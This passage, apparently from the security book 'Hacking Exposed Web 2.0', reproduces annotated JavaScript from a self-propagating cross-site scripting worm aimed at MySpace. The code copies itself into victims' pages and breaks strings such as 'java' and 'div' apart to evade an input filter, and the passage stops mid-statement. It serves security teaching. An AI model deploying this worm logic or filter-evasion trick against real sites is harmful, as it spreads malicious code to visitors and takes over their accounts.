
Rich Cannings, Himanshu Dwivedi, Zane Lackey, and Alex Stamos

"Hacking Exposed Web 2.0: Web 2.0 Security Secrets and Solutions"


// I.e. all of the code you are reading now. The code will then be inserted
// into the victim's page so that people who visit a victim's page
// will also become victims.
var htmlBody = getHtmlBody();
// Mark the beginning of the script injection and attack code.
var myCodeBlockIndex = htmlBody.indexOf('m' + 'ycode');
var myRoughCodeBlock = htmlBody.substring( myCodeBlockIndex,
myCodeBlockIndex + 4096);
var myCodeBlockEndIndex = myRoughCodeBlock.indexOf('d' + 'iv');
// Mark the ending of the script injection and attack code.
// myCodeBlock ends with "// "div>" when creating the "heroCommentWithWorm" variable.
var myCodeBlock = myRoughCodeBlock.substring(0, myCodeBlockEndIndex);
// This variable is populated with the worm code that is placed into the
// victim's page so that anyone visiting the victim's page will become a
// victim themselves.
var heroCommentWithWorm;
if (myCodeBlock) {
// Apparently, MySpace disallowed user input containing strings like
// "java", "div", and "expr". Splitting those strings with concatenation
// (e.g. 'd' + 'iv') evades that literal-substring filter, which is why
// they are broken up below.
myCodeBlock = myCodeBlock.replace('jav' + 'a', singleQuote + 'jav' + 'a');
myCodeBlock = myCodeBlock.

